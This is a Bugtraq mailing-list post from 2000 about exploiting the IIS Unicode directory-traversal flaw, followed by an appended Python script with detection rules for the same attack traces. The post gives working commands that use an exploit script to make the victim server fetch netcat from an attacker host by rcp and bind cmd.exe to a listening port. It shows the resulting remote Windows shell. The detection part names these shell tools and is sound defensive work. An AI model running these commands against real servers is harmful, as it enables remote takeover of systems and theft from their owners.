Bugtraq mailing list archives
IIS Unicode
From: Roelof Temmingh <roelof () SENSEPOST COM>
Date: Wed, 25 Oct 2000 02:54:58 +0200
Bugtraq ID 1806, http://www.securityfocus.com/vdb/bottom.html?vid=1806 applies:

I was having problems executing a command that contains a redirect (>) using any of the IIS Unicode exploits (including my own exploits on security focus ;) ). If anyone can get a redirect working, please let me know.

In order to get some interesting tools on the victim, you would probably want to have the victim FTP to the attacker. The problem without a redirect is that you cannot build the FTP command file, and you are a bit stuck.

A workaround (example) (with an rsh running on the attacker's host and the necessary config in .rhosts):

perl unicodexecute.pl 160.124.19.101:80 'rcp -b 160.124.19.98.roelof:/tmp/nc.exe nc.exe'
perl unicodexecute.pl 160.124.19.101:80 'c:\inetpub\scripts\nc.exe -l -p 8888 -e cmd.exe'
telnet 160.124.19.101 8888
Trying 160.124.19.101...
Connected to clickfeed.
Escape character is '^]'.

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\Inetpub\scripts>

Of course you need to allow port 514 to the inside of your net etc. ;)

Have fun,
Roelof.

PS: this is a bit of a rip off from www.hack.co.za - spawncmd.pl

------------------------------------------------------
Roelof W Temmingh
SensePost IT security
roelof () sensepost com
+27 83 448 6996
http://www.sensepost.com
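
For defenders, the host-side traces of the workaround in the message above can be triaged with a few rules; this is an added example, not part of the original post or of any tool it names. The event record layout, the rule names and the web server process names (inetinfo.exe, dllhost.exe) are assumptions, and the sample events are constructed from the commands quoted in the post.

```python
import re

# Assumption: image names of the processes that host IIS script execution.
WEB_PARENTS = {"inetinfo.exe", "dllhost.exe"}
# File-transfer clients named in the post (rcp, FTP).
TRANSFER_TOOLS = {"rcp.exe", "ftp.exe"}
# Web content tree used in the post (c:\inetpub\scripts).
WEB_ROOT = re.compile(r"^c:\\inetpub\\", re.I)
# A command interpreter handed to a program via "-e", as in the post's nc.exe line.
SHELL_BIND = re.compile(r"(?:^|\s)-e\s+\S*cmd(?:\.exe)?\b", re.I)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the names of the rules one process-creation event trips."""
    hits = []
    image = basename(event["image"])
    from_web = any(basename(a) in WEB_PARENTS for a in event["ancestors"])
    if from_web and image in TRANSFER_TOOLS:
        hits.append("web-server-spawned-file-transfer")
    if WEB_ROOT.match(event["image"]) and image.endswith(".exe"):
        hits.append("executable-in-web-content-dir")
    if SHELL_BIND.search(event["cmdline"]):
        hits.append("shell-bound-to-socket")
    return hits

def triage(events):
    """Map event index -> tripped rules, keeping only events with hits."""
    flagged = {}
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            flagged[i] = hits
    return flagged

# Constructed sample events (not real logs); hypothetical record format.
SAMPLE_EVENTS = [
    {"ancestors": [r"C:\WINNT\system32\inetsrv\inetinfo.exe"],
     "image": r"C:\WINNT\system32\rcp.exe",
     "cmdline": r"rcp -b 160.124.19.98.roelof:/tmp/nc.exe nc.exe"},
    {"ancestors": [r"C:\WINNT\system32\inetsrv\inetinfo.exe"],
     "image": r"c:\inetpub\scripts\nc.exe",
     "cmdline": r"c:\inetpub\scripts\nc.exe -l -p 8888 -e cmd.exe"},
    {"ancestors": [r"C:\WINNT\explorer.exe"],
     "image": r"C:\WINNT\system32\ftp.exe",
     "cmdline": r"ftp intranet.example"},
]

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["cmdline"], "->", ", ".join(rules))
```

The third event, an interactive FTP session started from the desktop shell, trips no rule, which is the benign baseline these rules need to leave alone.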